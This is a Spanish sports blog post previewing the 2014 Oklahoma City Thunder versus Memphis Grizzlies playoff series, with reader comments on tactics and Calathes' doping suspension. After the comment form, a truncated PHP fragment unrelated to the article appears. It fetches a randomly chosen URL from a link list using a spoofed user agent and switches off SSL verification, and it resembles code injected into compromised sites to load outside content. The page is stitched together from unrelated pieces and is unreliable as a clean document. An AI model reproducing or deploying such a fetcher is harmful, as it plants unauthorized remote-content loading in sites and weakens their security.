PO 2014: Previa Oklahoma City Thunder – Memphis Grizzlies

18 de April de 2014 por TheDeerHunter

Toca revancha de las semifinales de conferencia del pasado curso. Entonces los Grizzlies parecían comerse el mundo y los Thunder no contaban con Russell Westbrook. El entramado defensivo dispuesto por Lionel Hollins llegó a aburrir a Durant que se encontró demasiado solo. “Zipi y Zape” destrozaron a Ibaka y Perkins. No hubo barrida de milagro.

El destino ha querido que ahora se enfrenten en primera ronda. Seguramente los hombres de Scott Brooks no querían ver a este rival ni en pintura tan pronto. Los osos se vieron obligados a poner “modo playoffs” desde hace más de un mes a fin de asegurarse la clasificación. Están calientes, saben competir y superarles no va a ser tarea fácil.
No obstante los Thunder, con toda su artillería operativa y con ventaja campo son uno de los peores rivales que pueden tocar en suerte. Durant está mejor que nunca, no vamos a descubrir ahora lo desiquilibrante que puede ser Westbrook y completan su particular “big three” con un Ibaka que ha dado otro paso adelante. Hay que añadir los buenos resultados que han dado otras piezas del equipo y también que los Grizzlies no están tan fuertes como antaño. Conviene recordar que los precedentes de la regular no les benefician. 3 a 1 y la única victoria la lograron en Memphis, dejándoles en 87 puntos. Repetir eso sí que no va a ser fácil. Joerger y su equipo sólo tienen una opción. Desactivar ofensivamente a los Thunder, dejándoles por debajo de los 90 puntos. Estos sin embargo saben jugar a muchos puntos y también a pocos, como lo demuestra la victoria 86 a 77 en Oklahoma. Se trata de una defensa también temible que el peor equipo ofensivo del cuadro del oeste sudará sangre para superar.

Este es el año de Durant. Ahora mismo está tocado por los dioses del baloncesto. Cualquier cosa que no sea superar esta primera ronda no entra en la cabeza de casi nadie.

Claves de la eliminatoria:

  • Impacto Westbrook: El efecto de la presencia del base all-star de los Thunder en los resultados no ha sido directamente proporcional al talento que se le presupone. Durant se ha visto más cómodo sin él. No obstante el recuerdo de la eliminatoria del año pasado debería bastar para que su disponibilidad suponga una inyección de confianza para los suyos. El duelo contra Conley será decisivo.
  • Los grandes osos: No hemos llegado a ver a Marc y Zach causar tantos estragos como solían, pero ahora toca echar el resto. Los interiores de Oklahoma aún tienen pesadillas de lo que pasó el año pasado y para colmo el banco viene reforzado con Koufos, Leuer y Davis. Reválida importante para Ibaka, en la mejor campaña de su vida.
  • Prince sobre Durant ¿seriously?: Que “el ángel exterminador” te meta más de 30 por noche no lo van a impedir ni con una metralleta. En ningún caso lo podrá hacer Tayshaun, que ya no es aquel excelso defensor que secaba al más pintado en los últimos Pistons campeones. La cuestión es si Joerger podrá emular a su antedecesor con aquel sistema de ayudas que mermaron tanto sus porcentajes. ¿Podrá ser James Johnson el Pondexter del año pasado?
  • Pagar la novatada: Las comparaciones son odiosas, pero es evidente que David Joerger va a ser examinado con lupa en los primeros playoffs que dirige como primer entrenador. Scott Brooks no tiene ese problema. Ya ha disputado unas cuantas batallas de éstas y no tiene la alargada sombra de nadie al acecho.

Pronóstico: 4-1 Thunder. Partidos duros de trinchera y bayoneta, pero que terminarán resolviendo a favor del favorito.

 

Comenta

5 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Muy importante también va a ser el físico de Marc, muy mermado durante toda la temporada. Parece que Memphis no llega tan bien como el año pasado, no les ha dado tiempo a ser tan compactos, tan equipo. Y además falta el jefe Hollins, que también era importantísimo no a nivel de esquemas, donde Joerger está acertando, pero sí a nivel de liderazgo. Lo cierto es que alcanzar las finales de conferencia del año pasado parece una utopía para los Grizzlies este año. El efecto Pondexter fue brutal en semifinales contra OKC como bien comentas Deer, destrozando a la paupérrima defensa de Kevin Martin con un 60% en triples o por ahí. Fue increíble. Este año Mike Miller podría ser el comodín oculto. Como siempre Courtney Lee va desapareciendo (inconsistencia es la palabra que define a este gran jugador, cuando quiere es gran jugador). Allen y Prince intentarán parar a Durant, pero como digo no estará Pondexter que fue el que consiguió bajar los números del animalito el año pasado.

    Por dentro Memphis es muy superior a pesar de Ibaka, pero por fuera OKC este año está de vicio, y solo la presencia de Westbrook ya es suficiente para finiquitar esto en 5 o 6 partidos como mucho. Ojalá me equivoque, porque tengo mucha simpatía a los Grizzlies de Marc, pero me parece que este año toca venganza de Oklahoma. Me parece no, es seguro que toca venganza.

      Citar

  2. TheDeerHunter dice:
    #2

    Juas, Calathes suspendido 20 partidos por violar la política anti-drogas de la NBA. Vaya tela.

      Citar

  3. Denise dice:
    #3

    TheDeerHunter:
    Juas, Calathes suspendido 20 partidos por violar la política anti-drogas de la NBA. Vaya tela.

    La sustancia es Tamoxifeno, que se emplea en medicina para tratar el cancer de mama, mientras que en el deporte se emplea para desarrollar masa muscular y ponerse cachas.

      Citar

  4. Ruxixon dice:
    #4

    Para mí la clave de la eliminatoria es el desgaste que puede aparecer en los Thunder esta eliminatoria de cara a la siguiente ronda,sobre todo si son los Clippers la siguiente parada.Lamentablemente veo muy reducidas las opciones de los ositos,que han llegado por los pelos a PO,no hay que olvidarlo.A Brooks no se le puede escapar esta serie si ha aprendido del año pasado,más teniendo en cuenta que Joerger no es Hollins.Con Westbrook de añadido,con los Grizzlies sin el tono físico del año pasado,con el tema Calathes tan reciente y con las ganas de venganza todo muy cuesta arriba para Memphis.

    Por cierto que lo de Calathes,manda eggs.Que el que hayan pillado se trate de un europeo es cuando menos paradójico.

      Citar

  5. Sancho88 dice:
    #5

    Dicen que lo que se tomó Calathes sirve para neutralizar el uso de esteroides. Es decir, se confirma lo que todos sabemos, y es que en la NBA van hasta el culo de mierda para hacerse gente enorme físicamente. Es solo un caso, pero se sabe que los controles antidopaje de la NBA son un chiste, que solo se hacen dos o tres al año y los jugadores saben cómo enmascarar la mierda que se toman, etc. En fin, es un tema que da para muchísimo debate, y muy delicado, porque lo del doping no está tan claro si es negativo o positivo para el deporte. Que luego a todos nos gusta ver las animaladas que hacen de estos tíos pensando que van limpios… no nos engañemos.

    Y sobre lo de infravalorar a los Grizzlies… ojo, no veo argumentos sólidos Ruxixon ahí. Han llegado por los pelos, sí, pero ganando partidos muy importantes contra equipos muy importantes. Y lo de Hollins, te compro el argumento a medias. Hollins era muy líder, un poco Messina tío plasta echa broncas, pero muy bueno en realidad, un motivador de cojones que consiguió crear a Marc Gasol como uno de los mejores pívots del mundo. Pero ojo porque Joerger está jugando unos sistemas de ataque que se caga la perra, e incluso analizándolos con respecto a Hollins, sale que con Joerge el equipo mueve incluso más la bola en ataque para encontrar mejores tiros. Y no me refiero al tuya-mía que jugaban los Pacers hace dos años, no, me refiero a los extra pass para meter canastas fáciles. Hollins las conseguía, pero Joerger se está analizando que lo hace incluso mejor, e incluso se está viendo a Randolph implicado en ese juego de pases, cuando con Hollins no se la pasaba a nadie.

    No obstante, muy difícil para Grizzlies, sí. Durant está imparable, no tienen a Pondexter, está Westbrook… en fin, poco que hacer. Creo que Grizzlies ganarán sus dos partidos de casa, se pondrán 2-2 y luego Oklahoma rematará la faena. Pero cuidado con los ositos que no van en plan cariñosos aunque hayan entrado in extremis

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>